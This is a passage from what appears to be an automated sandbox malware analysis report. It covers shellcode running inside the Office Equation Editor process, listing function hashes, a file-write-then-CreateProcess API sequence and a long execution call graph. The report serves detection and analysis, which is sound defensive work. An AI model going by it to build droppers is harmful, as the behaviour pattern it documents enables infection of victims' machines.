                                          • WriteFile.KERNELBASE(0359043C,03590453,00000000,00000000,00000000,?,03590453,0359043C,00000000,00000000,00000000,00000000,035903F5,00000050,00000000), ref: 0359054B
                                          • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,03590592,?,03590570), ref: 035905CA
                                          • ExitProcess.KERNELBASE(00000000,?,035905D1,?,03590592,?,03590570,?,?,03590557,00000000,00000000,00000000,00000000,035903F5,00000050), ref: 035905E2
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: Process$CreateExitFileWrite
                                          • String ID:
                                          • API String ID: 3739231918-0
                                          • Opcode ID: 19abb07f664a7bfaba3f6f8eb50ada1189bdad441aab37431a0cbd58e181a6b3
                                          • Instruction ID: a311dd5db77c0966ff43d82d7be804f5055500e0fc02a14acb07c76575cb12ce
                                          • Opcode Fuzzy Hash: 19abb07f664a7bfaba3f6f8eb50ada1189bdad441aab37431a0cbd58e181a6b3
                                          • Instruction Fuzzy Hash: 04115EB0408346BEEB11EA54DD41FAFBBB9FFC0B00F148D1EB195460B1EB7199088A66
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0359032C Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 833f1fdb2df954a47779238e40c14f53762179b8aaffb34f45396806a607e277
                                          • Instruction ID: 0a5d2b7db1a6786a61ecb81ebbe788058218701cf0e883138a6c3ad0f673893f
                                          • Opcode Fuzzy Hash: 833f1fdb2df954a47779238e40c14f53762179b8aaffb34f45396806a607e277
                                          • Instruction Fuzzy Hash: 16019AA540C7C01FFB22C2702C9AB84BE647F56604F0D8A8FA6C49F0E392A4A10A9312
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 035904A8 Relevance: 1.5, APIs: 1, Instructions: 41processCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 035904C4: WriteFile.KERNELBASE(0359043C,03590453,00000000,00000000,00000000,?,03590453,0359043C,00000000,00000000,00000000,00000000,035903F5,00000050,00000000), ref: 0359054B
                                          • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,03590592,?,03590570), ref: 035905CA
                                          • ExitProcess.KERNELBASE(00000000,?,035905D1,?,03590592,?,03590570,?,?,03590557,00000000,00000000,00000000,00000000,035903F5,00000050), ref: 035905E2
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: Process$CreateExitFileWrite
                                          • String ID:
                                          • API String ID: 3739231918-0
                                          • Opcode ID: ab915c4d70da9f5e50a6ad1d4eaedeb20efed64c161fa0c5c37ea620a5e12464
                                          • Instruction ID: ec54ff6309cb440ed69d7f607e68d6993e60c0019beaa3bcd8a7763c46aa234b
                                          • Opcode Fuzzy Hash: ab915c4d70da9f5e50a6ad1d4eaedeb20efed64c161fa0c5c37ea620a5e12464
                                          • Instruction Fuzzy Hash: D6F0FBB1008346AFEB01DE54DC41E6BBBAAFFC5B40F048D1EB1944A0B5D671D9088A62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03590378 Relevance: 1.5, APIs: 1, Instructions: 21fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNELBASE(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 03590395
                                            • Part of subcall function 035903AF: LoadLibraryW.KERNEL32(0359039F), ref: 035903AF
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: CreateFileLibraryLoad
                                          • String ID:
                                          • API String ID: 2049390123-0
                                          • Opcode ID: 6b58b7bea42888d99f99c58fd6019879577d5c0d287c541efadc83ec232d07e8
                                          • Instruction ID: 416e03f5ae4581633a8dc9bd0f66dc3732a289f5ee2fc48d61b0a41f1f53dac0
                                          • Opcode Fuzzy Hash: 6b58b7bea42888d99f99c58fd6019879577d5c0d287c541efadc83ec232d07e8
                                          • Instruction Fuzzy Hash: AEE0C2301483902FF930D3300C4AF95BDA43F89B00F09CC8BB2C4AF0F2C6A060048212
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 035905DD Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                          Download Yara Rule
                                          APIs
                                          • ExitProcess.KERNELBASE(00000000,?,035905D1,?,03590592,?,03590570,?,?,03590557,00000000,00000000,00000000,00000000,035903F5,00000050), ref: 035905E2
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0
                                          • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                          • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                                          • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 035905E4 Relevance: .0, Instructions: 14COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                          • Instruction ID: dad8d9ebd07a3382fd4c97aa96f1f4a8564408607266d4b95447d883cdca1f84
                                          • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                          • Instruction Fuzzy Hash: 38D052B12025029FE704DB08DA80E13F37AFFC8220B28C669E5004B66AC330E892CA90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 03590242 Relevance: .0, Instructions: 10COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.444520307.0000000003590000.00000004.00000020.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_3590000_EQNEDT32.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d63d9cbe7aee2b22caec2abe761ef9f448886455dde74c3a1debfea27b2c1948
                                          • Instruction ID: 6eeaa356b2d4eef8eaba7b014a207092e669dd60636457438198d266d7304795
                                          • Opcode Fuzzy Hash: d63d9cbe7aee2b22caec2abe761ef9f448886455dde74c3a1debfea27b2c1948
                                          • Instruction Fuzzy Hash: EFB092504088F24589479620AE686C4BF2144426093085781D0CC22012C11605669281
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:3.7%
                                          Dynamic/Decrypted Code Coverage:0.4%
                                          Signature Coverage:3%
                                          Total number of Nodes:2000
                                          Total number of Limit Nodes:69
                                          execution_graph 93468 e41044 93473 e410f3 93468->93473 93470 e4104a 93509 e600a3 29 API calls __onexit 93470->93509 93472 e41054 93510 e41398 93473->93510 93477 e4116a 93520 e4a961 93477->93520 93480 e4a961 22 API calls 93481 e4117e 93480->93481 93482 e4a961 22 API calls 93481->93482 93483 e41188 93482->93483 93484 e4a961 22 API calls 93483->93484 93485 e411c6 93484->93485 93486 e4a961 22 API calls 93485->93486 93487 e41292 93486->93487 93525 e4171c 93487->93525 93491 e412c4 93492 e4a961 22 API calls 93491->93492 93493 e412ce 93492->93493 93546 e51940 93493->93546 93495 e412f9 93556 e41aab 93495->93556 93497 e41315 93498 e41325 GetStdHandle 93497->93498 93499 e82485 93498->93499 93500 e4137a 93498->93500 93499->93500 93501 e8248e 93499->93501 93504 e41387 OleInitialize 93500->93504 93563 e5fddb 93501->93563 93503 e82495 93573 eb011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 93503->93573 93504->93470 93506 e8249e 93574 eb0944 CreateThread 93506->93574 93509->93472 93575 e413f1 93510->93575 93513 e413f1 22 API calls 93514 e413d0 93513->93514 93515 e4a961 22 API calls 93514->93515 93516 e413dc 93515->93516 93582 e46b57 93516->93582 93518 e41129 93519 e41bc3 6 API calls 93518->93519 93519->93477 93521 e5fe0b 22 API calls 93520->93521 93522 e4a976 93521->93522 93523 e5fddb 22 API calls 93522->93523 93524 e41174 93523->93524 93524->93480 93526 e4a961 22 API calls 93525->93526 93527 e4172c 93526->93527 93528 e4a961 22 API calls 93527->93528 93529 e41734 93528->93529 93530 e4a961 22 API calls 93529->93530 93531 e4174f 93530->93531 93532 e5fddb 22 API calls 93531->93532 93533 e4129c 93532->93533 93534 e41b4a 93533->93534 93535 e41b58 93534->93535 93536 e4a961 22 API calls 93535->93536 93537 e41b63 93536->93537 93538 e4a961 22 API calls 93537->93538 93539 e41b6e 93538->93539 93540 e4a961 22 API calls 93539->93540 93541 e41b79 93540->93541 93542 e4a961 22 API calls 93541->93542 93543 e41b84 93542->93543 93544 e5fddb 22 API calls 93543->93544 93545 e41b96 RegisterWindowMessageW 93544->93545 93545->93491 93547 e51981 93546->93547 93554 e5195d 93546->93554 93627 e60242 5 API calls __Init_thread_wait 93547->93627 93548 e5196e 93548->93495 93551 e5198b 93551->93554 93628 e601f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 93551->93628 93552 e58727 93552->93548 93630 e601f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 93552->93630 93554->93548 93629 e60242 5 API calls __Init_thread_wait 93554->93629 93557 e8272d 93556->93557 93558 e41abb 93556->93558 93631 eb3209 23 API calls 93557->93631 93559 e5fddb 22 API calls 93558->93559 93562 e41ac3 93559->93562 93561 e82738 93562->93497 93565 e5fde0 93563->93565 93564 e6ea0c ___std_exception_copy 21 API calls 93564->93565 93565->93564 93566 e5fdfa 93565->93566 93570 e5fdfc 93565->93570 93632 e64ead 7 API calls 2 library calls 93565->93632 93566->93503 93568 e6066d 93634 e632a4 RaiseException 93568->93634 93570->93568 93633 e632a4 RaiseException 93570->93633 93572 e6068a 93572->93503 93573->93506 93576 e4a961 22 API calls 93575->93576 93577 e413fc 93576->93577 93578 e4a961 22 API calls 93577->93578 93579 e41404 93578->93579 93580 e4a961 22 API calls 93579->93580 93581 e413c6 93580->93581 93581->93513 93583 e46b67 _wcslen 93582->93583 93584 e84ba1 93582->93584 93587 e46ba2 93583->93587 93588 e46b7d 93583->93588 93605 e493b2 93584->93605 93586 e84baa 93586->93586 93590 e5fddb 22 API calls 93587->93590 93594 e46f34 22 API calls 93588->93594 93592 e46bae 93590->93592 93591 e46b85 __fread_nolock 93591->93518 93595 e5fe0b 93592->93595 93594->93591 93597 e5fddb 93595->93597 93598 e5fdfa 93597->93598 93601 e5fdfc 93597->93601 93609 e6ea0c 93597->93609 93616 e64ead 7 API calls 2 library calls 93597->93616 93598->93591 93600 e6066d 93618 e632a4 RaiseException 93600->93618 93601->93600 93617 e632a4 RaiseException 93601->93617 93603 e6068a 93603->93591 93606 e493c0 93605->93606 93607 e493c9 __fread_nolock 93605->93607 93606->93607 93621 e4aec9 93606->93621 93607->93586 93607->93607 93614 e73820 _free 93609->93614 93610 e7385e 93620 e6f2d9 20 API calls _free 93610->93620 93612 e73849 RtlAllocateHeap 93613 e7385c 93612->93613 93612->93614 93613->93597 93614->93610 93614->93612 93619 e64ead 7 API calls 2 library calls 93614->93619 93616->93597 93617->93600 93618->93603 93619->93614 93620->93613 93622 e4aedc 93621->93622 93623 e4aed9 __fread_nolock 93621->93623 93624 e5fddb 22 API calls 93622->93624 93623->93607 93625 e4aee7 93624->93625 93626 e5fe0b 22 API calls 93625->93626 93626->93623 93627->93551 93628->93554 93629->93552 93630->93548 93631->93561 93632->93565 93633->93568 93634->93572 93636 112410 93650 110000 93636->93650 93638 1124ab 93653 112300 93638->93653 93656 1134d0 GetPEB 93650->93656 93652 11068b 93652->93638 93654 112309 Sleep 93653->93654 93655 112317 93654->93655 93657 1134fa 93656->93657 93657->93652 93658 e4dee5 93661 e4b710 93658->93661 93662 e4b72b 93661->93662 93663 e900f8 93662->93663 93664 e90146 93662->93664 93687 e4b750 93662->93687 93667 e90102 93663->93667 93670 e9010f 93663->93670 93663->93687 93727 ec58a2 256 API calls 2 library calls 93664->93727 93725 ec5d33 256 API calls 93667->93725 93683 e4ba20 93670->93683 93726 ec61d0 256 API calls 2 library calls 93670->93726 93674 e903d9 93674->93674 93675 e5d336 40 API calls 93675->93687 93677 e4ba4e 93679 e90322 93734 ec5c0c 82 API calls 93679->93734 93683->93677 93735 eb359c 82 API calls __wsopen_s 93683->93735 93687->93675 93687->93677 93687->93679 93687->93683 93688 e4bbe0 40 API calls 93687->93688 93692 e4ec40 93687->93692 93716 e4a81b 41 API calls 93687->93716 93717 e5d2f0 40 API calls 93687->93717 93718 e5a01b 256 API calls 93687->93718 93719 e60242 5 API calls __Init_thread_wait 93687->93719 93720 e5edcd 22 API calls 93687->93720 93721 e600a3 29 API calls __onexit 93687->93721 93722 e601f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 93687->93722 93723 e5ee53 82 API calls 93687->93723 93724 e5e5ca 256 API calls 93687->93724 93728 e4aceb 23 API calls ISource 93687->93728 93729 e9f6bf 23 API calls 93687->93729 93730 e4a8c7 93687->93730 93688->93687 93715 e4ec76 ISource 93692->93715 93693 e5fddb 22 API calls 93693->93715 93694 e60242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 93694->93715 93695 e601f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 93695->93715 93696 e4fef7 93703 e4a8c7 22 API calls 93696->93703 93709 e4ed9d ISource 93696->93709 93699 e94b0b 93752 eb359c 82 API calls __wsopen_s 93699->93752 93700 e4a8c7 22 API calls 93700->93715 93701 e94600 93705 e4a8c7 22 API calls 93701->93705 93701->93709 93703->93709 93705->93709 93707 e4fbe3 93707->93709 93710 e94bdc 93707->93710 93712 e4f3ae ISource 93707->93712 93708 e4a961 22 API calls 93708->93715 93709->93687 93753 eb359c 82 API calls __wsopen_s 93710->93753 93712->93709 93751 eb359c 82 API calls __wsopen_s 93712->93751 93713 e600a3 29 API calls pre_c_initialization 93713->93715 93714 e94beb 93754 eb359c 82 API calls __wsopen_s 93714->93754 93715->93693 93715->93694 93715->93695 93715->93696 93715->93699 93715->93700 93715->93701 93715->93707 93715->93708 93715->93709 93715->93712 93715->93713 93715->93714 93736 e506a0 93715->93736 93750 e501e0 256 API calls 2 library calls 93715->93750 93716->93687 93717->93687 93718->93687 93719->93687 93720->93687 93721->93687 93722->93687 93723->93687 93724->93687 93725->93670 93726->93683 93727->93687 93728->93687 93729->93687 93731 e4a8ea __fread_nolock 93730->93731 93732 e4a8db 93730->93732 93731->93687 93732->93731 93733 e5fe0b 22 API calls 93732->93733 93733->93731 93734->93683 93735->93674 93739 e506bd 93736->93739 93746 e50863 ISource 93736->93746 93737 e50d36 93740 e50847 ISource 93737->93740 93758 e5acd5 39 API calls 93737->93758 93739->93737 93739->93740 93742 e5081e 93739->93742 93739->93746 93747 e5082a ISource 93739->93747 93740->93715 93742->93747 93749 e95e15 93742->93749 93743 e95ffd 93745 e9600f 93743->93745 93757 e6cf65 39 API calls 93743->93757 93745->93715 93746->93737 93746->93740 93746->93743 93746->93747 93747->93740 93747->93743 93756 e5ce17 22 API calls ISource 93747->93756 93755 e6cf65 39 API calls 93749->93755 93750->93715 93751->93709 93752->93709 93753->93714 93754->93709 93755->93749 93756->93747 93757->93745 93758->93740 93759 e78402 93764 e781be 93759->93764 93762 e7842a 93765 e781ef try_get_first_available_module 93764->93765 93772 e78338 93765->93772 93779 e68e0b 40 API calls 2 library calls 93765->93779 93767 e783ee 93783 e727ec 26 API calls __cftof 93767->93783 93769 e78343 93769->93762 93776 e80984 93769->93776 93771 e7838c 93771->93772 93780 e68e0b 40 API calls 2 library calls 93771->93780 93772->93769 93782 e6f2d9 20 API calls _free 93772->93782 93774 e783ab 93774->93772 93781 e68e0b 40 API calls 2 library calls 93774->93781 93784 e80081 93776->93784 93778 e8099f 93778->93762 93779->93771 93780->93774 93781->93772 93782->93767 93783->93769 93785 e8008d __FrameHandler3::FrameUnwindToState 93784->93785 93786 e8009b 93785->93786 93788 e800d4 93785->93788 93842 e6f2d9 20 API calls _free 93786->93842 93795 e8065b 93788->93795 93789 e800a0 93843 e727ec 26 API calls __cftof 93789->93843 93794 e800aa __fread_nolock 93794->93778 93845 e8042f 93795->93845 93798 e8068d 93877 e6f2c6 20 API calls _free 93798->93877 93799 e806a6 93863 e75221 93799->93863 93802 e80692 93878 e6f2d9 20 API calls _free 93802->93878 93803 e806ab 93804 e806cb 93803->93804 93805 e806b4 93803->93805 93876 e8039a CreateFileW 93804->93876 93879 e6f2c6 20 API calls _free 93805->93879 93809 e806b9 93880 e6f2d9 20 API calls _free 93809->93880 93810 e800f8 93844 e80121 LeaveCriticalSection __wsopen_s 93810->93844 93812 e80781 GetFileType 93813 e8078c GetLastError 93812->93813 93814 e807d3 93812->93814 93883 e6f2a3 20 API calls 2 library calls 93813->93883 93885 e7516a 21 API calls 3 library calls 93814->93885 93815 e80756 GetLastError 93882 e6f2a3 20 API calls 2 library calls 93815->93882 93817 e80704 93817->93812 93817->93815 93881 e8039a CreateFileW 93817->93881 93819 e8079a CloseHandle 93819->93802 93821 e807c3 93819->93821 93884 e6f2d9 20 API calls _free 93821->93884 93823 e80749 93823->93812 93823->93815 93825 e807f4 93827 e80840 93825->93827 93886 e805ab 72 API calls 4 library calls 93825->93886 93826 e807c8 93826->93802 93831 e8086d 93827->93831 93887 e8014d 72 API calls 4 library calls 93827->93887 93830 e80866 93830->93831 93832 e8087e 93830->93832 93888 e786ae 93831->93888 93832->93810 93834 e808fc CloseHandle 93832->93834 93903 e8039a CreateFileW 93834->93903 93836 e80927 93837 e80931 GetLastError 93836->93837 93838 e8095d 93836->93838 93904 e6f2a3 20 API calls 2 library calls 93837->93904 93838->93810 93840 e8093d 93905 e75333 21 API calls 3 library calls 93840->93905 93842->93789 93843->93794 93844->93794 93846 e80450 93845->93846 93847 e8046a 93845->93847 93846->93847 93913 e6f2d9 20 API calls _free 93846->93913 93906 e803bf 93847->93906 93849 e804a2 93861 e804d1 93849->93861 93915 e6f2d9 20 API calls _free 93849->93915 93851 e8045f 93914 e727ec 26 API calls __cftof 93851->93914 93855 e8051f 93857 e8059e 93855->93857 93859 e80524 93855->93859 93856 e804c6 93916 e727ec 26 API calls __cftof 93856->93916 93918 e727fc 11 API calls _abort 93857->93918 93859->93798 93859->93799 93861->93859 93917 e6d70d 26 API calls 2 library calls 93861->93917 93862 e805aa 93864 e7522d __FrameHandler3::FrameUnwindToState 93863->93864 93921 e72f5e EnterCriticalSection 93864->93921 93867 e75234 93868 e75259 93867->93868 93872 e752c7 EnterCriticalSection 93867->93872 93874 e7527b 93867->93874 93925 e75000 93868->93925 93869 e752a4 __fread_nolock 93869->93803 93872->93874 93875 e752d4 LeaveCriticalSection 93872->93875 93922 e7532a 93874->93922 93875->93867 93876->93817 93877->93802 93878->93810 93879->93809 93880->93802 93881->93823 93882->93802 93883->93819 93884->93826 93885->93825 93886->93827 93887->93830 93951 e753c4 93888->93951 93890 e786c4 93964 e75333 21 API calls 3 library calls 93890->93964 93892 e786be 93892->93890 93893 e753c4 __wsopen_s 26 API calls 93892->93893 93902 e786f6 93892->93902 93896 e786ed 93893->93896 93894 e753c4 __wsopen_s 26 API calls 93897 e78702 CloseHandle 93894->93897 93895 e7871c 93898 e7873e 93895->93898 93965 e6f2a3 20 API calls 2 library calls 93895->93965 93899 e753c4 __wsopen_s 26 API calls 93896->93899 93897->93890 93900 e7870e GetLastError 93897->93900 93898->93810 93899->93902 93900->93890 93902->93890 93902->93894 93903->93836 93904->93840 93905->93838 93907 e803d7 93906->93907 93908 e803f2 93907->93908 93919 e6f2d9 20 API calls _free 93907->93919 93908->93849 93910 e80416 93920 e727ec 26 API calls __cftof 93910->93920 93912 e80421 93912->93849 93913->93851 93914->93847 93915->93856 93916->93861 93917->93855 93918->93862 93919->93910 93920->93912 93921->93867 93933 e72fa6 LeaveCriticalSection 93922->93933 93924 e75331 93924->93869 93934 e74c7d 93925->93934 93927 e7501f 93942 e729c8 93927->93942 93928 e75012 93928->93927 93941 e73405 11 API calls 2 library calls 93928->93941 93931 e75071 93931->93874 93932 e75147 EnterCriticalSection 93931->93932 93932->93874 93933->93924 93939 e74c8a _free 93934->93939 93935 e74cca 93949 e6f2d9 20 API calls _free 93935->93949 93936 e74cb5 RtlAllocateHeap 93937 e74cc8 93936->93937 93936->93939 93937->93928 93939->93935 93939->93936 93948 e64ead 7 API calls 2 library calls 93939->93948 93941->93928 93943 e729d3 HeapFree 93942->93943 93944 e729fc _free 93942->93944 93943->93944 93945 e729e8 93943->93945 93944->93931 93950 e6f2d9 20 API calls _free 93945->93950 93947 e729ee GetLastError 93947->93944 93948->93939 93949->93937 93950->93947 93952 e753e6 93951->93952 93953 e753d1 93951->93953 93957 e7540b 93952->93957 93968 e6f2c6 20 API calls _free 93952->93968 93966 e6f2c6 20 API calls _free 93953->93966 93956 e753d6 93967 e6f2d9 20 API calls _free 93956->93967 93957->93892 93958 e75416 93969 e6f2d9 20 API calls _free 93958->93969 93960 e753de 93960->93892 93962 e7541e 93970 e727ec 26 API calls __cftof 93962->93970 93964->93895 93965->93898 93966->93956 93967->93960 93968->93958 93969->93962 93970->93960 93971 e42de3 93972 e42df0 __wsopen_s 93971->93972 93973 e82c2b ___scrt_fastfail 93972->93973 93974 e42e09 93972->93974 93977 e82c47 GetOpenFileNameW 93973->93977 93987 e43aa2 93974->93987 93978 e82c96 93977->93978 93980 e46b57 22 API calls 93978->93980 93982 e82cab 93980->93982 93982->93982 93984 e42e27 94015 e444a8 93984->94015 94044 e81f50 93987->94044 93990 e43ace 93992 e46b57 22 API calls 93990->93992 93991 e43ae9 94050 e4a6c3 93991->94050 93994 e43ada 93992->93994 94046 e437a0 93994->94046 93997 e42da5 93998 e81f50 __wsopen_s 93997->93998 93999 e42db2 GetLongPathNameW 93998->93999 94000 e46b57 22 API calls 93999->94000 94001 e42dda 94000->94001 94002 e43598 94001->94002 94003 e4a961 22 API calls 94002->94003 94004 e435aa 94003->94004 94005 e43aa2 23 API calls 94004->94005 94006 e435b5 94005->94006 94007 e832eb 94006->94007 94008 e435c0 94006->94008 94012 e8330d 94007->94012 94068 e5ce60 41 API calls 94007->94068 94056 e4515f 94008->94056 94014 e435df 94014->93984 94069 e44ecb 94015->94069 94018 e83833 94091 eb2cf9 94018->94091 94020 e44ecb 94 API calls 94022 e444e1 94020->94022 94021 e83848 94023 e83869 94021->94023 94024 e8384c 94021->94024 94022->94018 94025 e444e9 94022->94025 94027 e5fe0b 22 API calls 94023->94027 94118 e44f39 94024->94118 94028 e444f5 94025->94028 94029 e83854 94025->94029 94043 e838ae 94027->94043 94117 e4940c 136 API calls 2 library calls 94028->94117 94124 eada5a 82 API calls 94029->94124 94032 e83862 94032->94023 94033 e42e31 94034 e83a5f 94035 e44f39 68 API calls 94034->94035 94130 ea989b 82 API calls __wsopen_s 94034->94130 94035->94034 94040 e49cb3 22 API calls 94040->94043 94043->94034 94043->94040 94125 ea967e 22 API calls __fread_nolock 94043->94125 94126 ea95ad 42 API calls _wcslen 94043->94126 94127 eb0b5a 22 API calls 94043->94127 94128 e4a4a1 22 API calls __fread_nolock 94043->94128 94129 e43ff7 22 API calls 94043->94129 94045 e43aaf GetFullPathNameW 94044->94045 94045->93990 94045->93991 94047 e437ae 94046->94047 94048 e493b2 22 API calls 94047->94048 94049 e42e12 94048->94049 94049->93997 94051 e4a6dd 94050->94051 94055 e4a6d0 94050->94055 94052 e5fddb 22 API calls 94051->94052 94053 e4a6e7 94052->94053 94054 e5fe0b 22 API calls 94053->94054 94054->94055 94055->93994 94057 e4516e 94056->94057 94061 e4518f __fread_nolock 94056->94061 94060 e5fe0b 22 API calls 94057->94060 94058 e5fddb 22 API calls 94059 e435cc 94058->94059 94062 e435f3 94059->94062 94060->94061 94061->94058 94063 e43605 94062->94063 94067 e43624 __fread_nolock 94062->94067 94066 e5fe0b 22 API calls 94063->94066 94064 e5fddb 22 API calls 94065 e4363b 94064->94065 94065->94014 94066->94067 94067->94064 94068->94007 94131 e44e90 LoadLibraryA 94069->94131 94074 e44ef6 LoadLibraryExW 94139 e44e59 LoadLibraryA 94074->94139 94075 e83ccf 94077 e44f39 68 API calls 94075->94077 94079 e83cd6 94077->94079 94081 e44e59 3 API calls 94079->94081 94082 e83cde 94081->94082 94161 e450f5 94082->94161 94083 e44f20 94083->94082 94084 e44f2c 94083->94084 94086 e44f39 68 API calls 94084->94086 94088 e444cd 94086->94088 94088->94018 94088->94020 94090 e83d05 94092 eb2d15 94091->94092 94093 e4511f 64 API calls 94092->94093 94094 eb2d29 94093->94094 94452 eb2e66 94094->94452 94097 e450f5 40 API calls 94098 eb2d56 94097->94098 94099 e450f5 40 API calls 94098->94099 94100 eb2d66 94099->94100 94101 e450f5 40 API calls 94100->94101 94102 eb2d81 94101->94102 94103 e450f5 40 API calls 94102->94103 94115 eb2d3f 94115->94021 94117->94033 94119 e44f43 94118->94119 94120 e44f4a 94118->94120 94121 e6e678 67 API calls 94119->94121 94122 e44f59 94120->94122 94123 e44f6a FreeLibrary 94120->94123 94121->94120 94122->94029 94123->94122 94124->94032 94125->94043 94126->94043 94127->94043 94128->94043 94129->94043 94130->94034 94132 e44ec6 94131->94132 94133 e44ea8 GetProcAddress 94131->94133 94136 e6e5eb 94132->94136 94134 e44eb8 94133->94134 94134->94132 94135 e44ebf FreeLibrary 94134->94135 94135->94132 94169 e6e52a 94136->94169 94138 e44eea 94138->94074 94138->94075 94140 e44e8d 94139->94140 94141 e44e6e GetProcAddress 94139->94141 94144 e44f80 94140->94144 94142 e44e7e 94141->94142 94142->94140 94143 e44e86 FreeLibrary 94142->94143 94143->94140 94145 e5fe0b 22 API calls 94144->94145 94146 e44f95 94145->94146 94221 e45722 94146->94221 94148 e44fa1 __fread_nolock 94149 e450a5 94148->94149 94150 e83d1d 94148->94150 94160 e44fdc 94148->94160 94224 e442a2 CreateStreamOnHGlobal 94149->94224 94235 eb304d 74 API calls 94150->94235 94153 e83d22 94155 e4511f 64 API calls 94153->94155 94154 e450f5 40 API calls 94154->94160 94156 e83d45 94155->94156 94157 e450f5 40 API calls 94156->94157 94158 e4506e ISource 94157->94158 94158->94083 94160->94153 94160->94154 94160->94158 94230 e4511f 94160->94230 94162 e45107 94161->94162 94163 e83d70 94161->94163 94257 e6e8c4 94162->94257 94166 eb28fe 94407 eb274e 94166->94407 94168 eb2919 94168->94090 94172 e6e536 __FrameHandler3::FrameUnwindToState 94169->94172 94170 e6e544 94194 e6f2d9 20 API calls _free 94170->94194 94172->94170 94174 e6e574 94172->94174 94173 e6e549 94195 e727ec 26 API calls __cftof 94173->94195 94176 e6e586 94174->94176 94177 e6e579 94174->94177 94186 e78061 94176->94186 94196 e6f2d9 20 API calls _free 94177->94196 94180 e6e58f 94181 e6e595 94180->94181 94183 e6e5a2 94180->94183 94197 e6f2d9 20 API calls _free 94181->94197 94198 e6e5d4 LeaveCriticalSection __fread_nolock 94183->94198 94185 e6e554 __fread_nolock 94185->94138 94187 e7806d __FrameHandler3::FrameUnwindToState 94186->94187 94199 e72f5e EnterCriticalSection 94187->94199 94189 e7807b 94200 e780fb 94189->94200 94193 e780ac __fread_nolock 94193->94180 94194->94173 94195->94185 94196->94185 94197->94185 94198->94185 94199->94189 94209 e7811e 94200->94209 94201 e78177 94203 e74c7d _free 20 API calls 94201->94203 94202 e78088 94213 e780b7 94202->94213 94204 e78180 94203->94204 94206 e729c8 _free 20 API calls 94204->94206 94207 e78189 94206->94207 94207->94202 94218 e73405 11 API calls 2 library calls 94207->94218 94209->94201 94209->94202 94216 e6918d EnterCriticalSection 94209->94216 94217 e691a1 LeaveCriticalSection 94209->94217 94210 e781a8 94219 e6918d EnterCriticalSection 94210->94219 94220 e72fa6 LeaveCriticalSection 94213->94220 94215 e780be 94215->94193 94216->94209 94217->94209 94218->94210 94219->94202 94220->94215 94222 e5fddb 22 API calls 94221->94222 94223 e45734 94222->94223 94223->94148 94225 e442bc FindResourceExW 